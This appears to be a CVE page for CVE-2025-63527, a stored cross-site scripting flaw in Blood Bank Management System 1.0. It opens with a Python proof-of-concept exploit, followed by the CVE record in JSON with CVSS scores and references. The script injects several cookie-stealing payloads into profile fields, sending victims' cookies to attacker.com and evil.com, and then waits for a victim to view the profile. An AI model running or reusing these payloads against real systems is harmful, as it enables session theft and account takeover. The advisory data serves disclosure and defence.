CVE-2025-63527

import requests # CVE-2025-63527 PoC - Blood Bank Management System XSS # Target: Blood Bank Management System 1.0 # Vulnerable Endpoint: updateprofile.php target_url = "http://target.com/updateprofile.php" login_url = "http://target.com/login.php" # XSS Payload - Cookie Stealer xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" # Step 1: Login with low-privilege account session = requests.Session() login_data = { "username": "attacker", "password": "password123" } session.post(login_url, data=login_data) # Step 2: Inject XSS payload via profile update profile_data = { "hname": xss_payload, "hemail": "<img src=x onerror=alert(document.cookie)>", "hpassword": "newpass123", "hphone": "<script>document.location='https://evil.com/log?c='+document.cookie</script>", "hcity": "<svg onload=fetch('https://attacker.com/?d='+btoa(document.cookie))>" } response = session.post(target_url, data=profile_data) # Step 3: When victim views profile, XSS executes print("XSS payload injected successfully") print("Waiting for victim to view: http://target.com/hprofile.php?id=ATTACKER_ID")

{"cve": {"id": "CVE-2025-63527", "sourceIdentifier": "[email protected]", "published": "2025-12-01T15:15:51.440", "lastModified": "2025-12-02T03:05:14.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site scripting (XSS) vulnerability exists in the Blood Bank Management System 1.0 within the updateprofile.php and hprofile.php components. The application fails to properly sanitize or encode user-supplied input before rendering it in response. An attacker can inject malicious JavaScript payloads into the hname, hemail, hpassword, hphone, hcity parameters, which are then executed in the victim's browser when the page is viewed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shridharshukl:blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5B391DFD-8072-4642-9A31-9E4DE8648367"}]}]}], "references": [{"url": "https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Shridharshukl/Blood-Bank-Management-System", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63527.md", "source": "[email protected]", "tags": ["Exploit"]}]}}